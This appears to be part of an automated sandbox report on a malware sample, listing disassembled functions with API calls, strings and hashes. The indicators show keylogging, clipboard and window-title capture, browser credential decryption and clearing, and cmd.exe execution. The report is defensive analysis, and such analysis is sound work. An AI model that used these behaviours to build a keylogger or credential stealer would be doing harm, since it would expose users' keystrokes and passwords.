CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86

Strings

Online Keylogger Started, xrefs: 0040AF03, 0040AF0C, 0040AF36

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

crypt32, xrefs: 00406A7D
CryptUnprotectData, xrefs: 00406A78

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::eofbit set, xrefs: 0040E822
ios_base::badbit set, xrefs: 0040E7EF
ios_base::failbit set, xrefs: 0040E815

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
RegSetValueExW.ADVAPI32 ref: 0041384D
RegCloseKey.ADVAPI32(004752D8), ref: 00413858

Strings

pth_unenc, xrefs: 00413818

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0

Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E016

Strings

bad locale name, xrefs: 0040E000

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 3446828153-604454484
Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

open, xrefs: 0041612A
cmd.exe, xrefs: 00416125
/C , xrefs: 0041610E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
UnhookWindowsHookEx.USER32 ref: 0040B8C7
TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Strings

pth_unenc, xrefs: 0040B8AC

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

User32.dll, xrefs: 0040140F
GetCursorInfo, xrefs: 0040140A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

[Cleared browsers logins and cookies.], xrefs: 0040C0E4
Cleared browsers logins and cookies., xrefs: 0040C0F5

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

[ , xrefs: 0040A58F
], xrefs: 0040A57B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
CloseHandle.KERNEL32(00000000), ref: 0041C4E5

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
CloseHandle.KERNEL32(00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000), ref: 0041C23B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004193F0
GetSystemMetrics.USER32 ref: 004193F6
GetSystemMetrics.USER32 ref: 004193FC
GetSystemMetrics.USER32 ref: 00419402

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B

Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[End of clipboard], xrefs: 0040B7D9
[Text copied to clipboard], xrefs: 0040B7E6

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

OCP, xrefs: 00451B8B
ACP, xrefs: 00451B55

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

Function 00449BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
GetFileType.KERNEL32 ref: 00449C4E

Strings

s, xrefs: 00449C85

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: s
API String ID: 3000768030-3006692533
Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

